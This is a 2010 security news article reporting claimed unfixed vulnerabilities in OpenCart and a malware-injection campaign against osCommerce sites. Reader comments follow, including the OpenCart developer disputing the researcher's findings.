Daily cyber threats and internet security news: network security, online safety and latest security alerts
July 6th, 2010

Critical Security Holes In OpenCart, Multiple osCommerce Websites Infected With Malicious Code

A security researcher claims he’s found a total of fourteen dangerous vulnerabilities in OpenCart. However, because the project’s lead developer is apparently unwilling to address security issues, he recommends that people migrate away from OpenCart as soon as possible. Security researchers also warn that multiple osCommerce websites have been compromised during the last few days. The rogue code injected into their pages attempts to infect visitors with malware served from an external domain.

OpenCart has grown to be one of the most popular open source online shopping cart systems along with osCommerce, Zen Cart and Magento. The software is used by thousands of online stores, that handle sensitive customer information on a daily basis.

Considering that people expect to be in a secure environment when they shop online, one would think that security is one of the primary development goals for such a project. However, a Mexican security researcher named Eduardo Vela, who goes by the online moniker of sirdarckcat, claims this couldn’t be further from the truth when it comes to OpenCart.

In his blog Mr. Vela explains that some time ago he tried to report several serious vulnerabilities to the OpenCart project on behalf of a fellow researcher who discovered them. Amongst these, there was a Local File Inclusion (LFI) flaw, an issue allowing remote arbitrary code execution and a critical cross-site request forgery (CSRF) bug, which could be exploited to take complete control of the Web application.

According to the researcher, who adheres to responsible disclosure practices, Daniel Kerr, the OpenCart lead developer asked not to bother him. Since then, further security audits of OpenCart performed by Mr. Vela and his associates have revealed a total of fourteen dangerous vulnerabilities, that, giving Daniel Kerr’s attitude towards security, will probably never get fixed. Therefore, the only advice left to give to webmasters is to stop using the product entirely.

The compromises of osCommerce websites have been detected by Sucuri Security, a company selling Website integrity monitoring solutions. An investigation into the incidents is ongoing, but it has been determined that all have been injected with a rogue script element loading code from an http://nt02. 3 address [intentionally malformed].

So far most of the affected websites also had clandestine files uploaded in their /images folder. These files are called inclasses.php, loadclasses.php or phpclasses.php. “If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible,” Sucuri researcher David Dede, advises.

The company is still trying to determine how the attackers succeeded in compromising the websites, but an osCommerce Remote File Injection (RFI) vulnerability disclosed about a month ago, might be responsible. The bug is in “file_manager.php” and according to a SecurityFocus advisory, is the result of failure to properly sanitize user input.

osCommerce is notorious for extremely long wait times between releases. The latest stable version is 2.2 RC2a and has been released more than two and a half years ago, on January 30, 2008. However, there are a few measures webmasters can take to protect their websites.

Credit: News

Share this item with others:

More on CyberInsecure:
  • osCommerce Compromised Sites Distribute ZeuS Spin-off Trojan, Millions Of Pages Infected
  • Vulnerable osCommerce Websites Exploited To Distribute Scareware Through Blackhat Search Engine Optimization
  • Unpatched Internet Explorer 7 Vulnerability Exploited As Microsoft Patch Fixes 28 Security Vulnerabilities
  • Microsoft’s October 2008 Update Plugs Critical Vulnerabilities In IE, Office And Windows
  • Critical Mac Flaws Triggered By Images Fixed By Apple

  • If you found this information useful, consider linking to it from your own website.
    Just copy and paste the code below into your website (Ctrl+C to copy)
    It will look like this: Critical Security Holes In OpenCart, Multiple osCommerce Websites Infected With Malicious Code

    6 Responses to “Critical Security Holes In OpenCart, Multiple osCommerce Websites Infected With Malicious Code”

    1. Mr. Vela is full of shit. this guy has found nothing that poses a threat to opencart users. There is no CRSF issue because that was fixed as of 1.4.8 so mr Vela decided to drop a version back to beef up his numbers. most of the security problems you found where related to the install/ directory not being deleted. we do advise all people using opencart to deleted their install directory on stage 4 of their install.

      Its like me telling the world cars are dangerous because some idiot smokes at a petrol station when filling his car up with gas.

      Its all about trying to make themselves well known among the hacking blogs.

    2. I am a new user to OpenCart and this ‘alert’ is quite alarming. However, I am glad to see that Daniel was not afraid to face the music and add to the other side of the story, colorful words and all. And the fact that Eduardo (paisano, no le des mal nombre al resto de nosotros con tus acciones) has not responded to this post certainly lends me to believe that Eduardo was bending the truth and being disingenuous.

    3. If you search Eduardo’s past history you will find that he has made up quite a lot of fake security problems on open source projects. The one before opencart was SMF (small machine forum). it seems though that the people that write this information in the bogs don’t really care that he makes things up.

    4. It is easy to deny when you haven’t been hit. My OSC site was hacked last night and I have fixed it. This is a very real threat and you should research hacks on any online software you intend to use.

    5. opencart is not oscommerce and it handles securirty a lot beter than oscommerce.

      there could be many number of reasons why your site was hacked. one of them could be a weak password another could be that your hosting company got hacked. 99% of the time i find this is the case.

      check your logs to see how the hacker got in. if you find they just got in with ftp access it means your host was hacked.

    6. I found this article is really useful for me in my job. Thanks for sharing this useful information.

    Leave a Reply

    Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.

    To prove you’re a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.